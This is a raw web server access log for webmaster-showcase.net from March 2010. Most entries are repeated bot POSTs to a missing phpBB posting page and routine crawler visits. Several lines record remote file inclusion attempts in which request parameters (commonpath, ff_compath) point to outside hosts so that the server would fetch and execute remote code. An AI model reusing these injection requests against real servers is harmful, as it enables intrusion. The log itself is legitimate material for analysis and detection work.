64.120.232.58 - - [11/Mar/2010:17:24:54 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:25:05 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:25:25 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:25:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:26:00 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
62.149.226.208 - - [11/Mar/2010:17:26:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:26:10 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:26:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.0" 404 563 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:26:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:26:54 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:26:59 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:27:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:17:27:16 -0800] "GET /playing.php/common/db.php?commonpath=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 404 599 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:17:27:16 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 404 604 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:17:27:16 -0800] "GET /logs/showfile.php/access_100226.log/playing.php/common/db.php?commonpath=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
76.10.128.217 - - [11/Mar/2010:17:27:16 -0800] "GET /logs/showfile.php/playing.php/common/db.php?commonpath=http://www.tehnomedia.ba/id1.txt?? HTTP/1.1" 200 1595 "-" "Mozilla/5.0" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:27:25 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:27:32 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:27:45 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:27:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:28:12 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:28:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:28:24 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:28:52 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:28:54 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:29:04 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:29:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:29:32 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:29:44 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:29:56 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.90.164.110 - - [11/Mar/2010:17:30:01 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
209.235.254.107 - - [11/Mar/2010:17:30:12 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:30:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:30:22 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:30:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:30:49 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:30:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:31:05 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:31:30 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:31:33 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:31:54 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:31:58 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.39.140.138 - - [11/Mar/2010:17:32:06 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:32:18 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:32:26 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:32:45 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:32:48 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:32:57 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
67.195.111.151 - - [11/Mar/2010:17:32:58 -0800] "GET /php/string2png.php?s=next&c=ff0000 HTTP/1.0" 200 1715 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:33:17 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:33:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
69.20.70.31 - - [11/Mar/2010:17:33:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:33:37 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:33:47 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:33:53 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
65.17.253.220 - - [11/Mar/2010:17:34:04 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:34:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:34:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:34:41 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:34:45 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:35:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:35:15 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:35:19 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:35:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:36:02 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:36:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:36:23 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:36:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:36:58 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:37:00 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
208.109.21.238 - - [11/Mar/2010:17:37:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:37:09 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:37:21 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:37:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:37:46 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:38:05 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:38:13 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:38:25 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
212.95.226.66 - - [11/Mar/2010:17:38:34 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:38:36 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:38:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:39:06 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:39:08 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:39:16 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:39:38 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
115.124.102.102 - - [11/Mar/2010:17:39:38 -0800] "GET /logs/showfile.php/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 200 1595 "-" "libwww-perl/5.820" "webmaster-showcase.net"
115.124.102.102 - - [11/Mar/2010:17:39:38 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 404 605 "-" "libwww-perl/5.820" "webmaster-showcase.net"
115.124.102.102 - - [11/Mar/2010:17:39:39 -0800] "GET /logs/showfile.php//components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.metodist.ru/images/id? HTTP/1.1" 200 1595 "-" "libwww-perl/5.820" "webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:39:41 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:39:55 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:40:03 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:40:25 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
38.107.191.80 - - [11/Mar/2010:17:40:31 -0800] "GET /robots.txt HTTP/1.1" 404 571 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:40:33 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:40:39 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
38.107.191.82 - - [11/Mar/2010:17:40:41 -0800] "GET /yahoo/ssi.php HTTP/1.1" 200 6852 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.webmaster-showcase.net"
38.107.191.83 - - [11/Mar/2010:17:40:45 -0800] "GET /robots.txt HTTP/1.1" 404 567 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "webmaster-showcase.net"
38.107.191.84 - - [11/Mar/2010:17:40:50 -0800] "GET / HTTP/1.1" 200 686 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "webmaster-showcase.net"
64.120.227.34 - - [11/Mar/2010:17:41:01 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
62.149.226.208 - - [11/Mar/2010:17:41:03 -0800] "GET / HTTP/1.0" 200 686 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.webmaster-showcase.net"
64.120.232.58 - - [11/Mar/2010:17:41:08 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
94.102.63.11 - - [11/Mar/2010:17:41:22 -0800] "POST /phpBB2/posting.php?sid=616ff3e2b72702c3315a99e3473af4f1 HTTP/1.1" 404 579 "http://www.sindaesung.com/guest/process.php" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.webmaster-showcase.net"
